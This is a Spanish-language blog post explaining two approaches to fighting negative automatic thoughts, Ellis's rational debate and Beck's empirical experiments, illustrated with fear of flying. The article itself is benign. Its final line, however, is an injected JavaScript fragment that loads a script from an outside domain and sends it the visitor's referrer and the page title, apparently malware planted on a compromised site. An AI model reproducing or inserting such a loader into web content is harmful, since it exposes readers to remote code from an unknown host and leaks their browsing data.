Combatir los pensamientos automáticos negativos

10/11/2010

A la hora de combatir los pensamientos automáticos negativos, existen dos grandes aproximaciones que podemos identificar con dos importantes psicoterapeutas, a pesar de que ambos utilizaron tanto la una como la otra.

La primera se identificaría con A. Ellis y consiste en discutir racionalmente los pensamientos automáticos negativos. Para este autor, tales pensamientos son imposiciones o exigencias que nos planteamos a nosotros mismos y que, como su propio nombre indica, suelen ser rígidas y absolutas o, en una palabra, irracionales, entendiendo por ello el que tengan consecuencias que interfieren en nuestra supervivencia y felicidad. Por ejemplo, pensar que no deberíamos volar porque es una experiencia horrorosa y terrible que somos completamente incapaces de tolerar o soportar. Así que, según Ellis, lo que habría que hacer es entablar un debate con nosotros mismos para poner en cuestión dichos pensamientos y sustituirlos por otros más adaptativos.

La segunda aproximación se identificaría con Aaron T. Beck y consiste en diseñar  pequeños experimentos para comprobar empíricamente la veracidad de los pensamientos automáticos negativos. Para él, tales pensamientos son el producto de ciertas distorsiones que mantenemos a la hora de interpretar la realidad. Por ejemplo, pensar que siempre lo vamos a pasar mal cuando volemos por el hecho de que una vez nos pusimos un poco nerviosos al atravesar una zona de turbulencias. Así que, según Beck, lo que habría que hacer es ponernos en una situación en la que pudiésemos comprobar si dichos pensamientos son ciertos o no y, en este último caso, sustituirlos por otros más realistas.

Como puede verse, ambas aproximaciones exigen que nos desdoblemos en esa persona que está dispuesta a ayudarnos para, de este modo, combatir los pensamientos automáticos negativos de la persona que tiene miedo a volar, ya sea debatiéndolos con ella o poniendo a esa persona en una situación en la que pueda comprobar empíricamente su veracidad.

Imagen | davidwallace

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;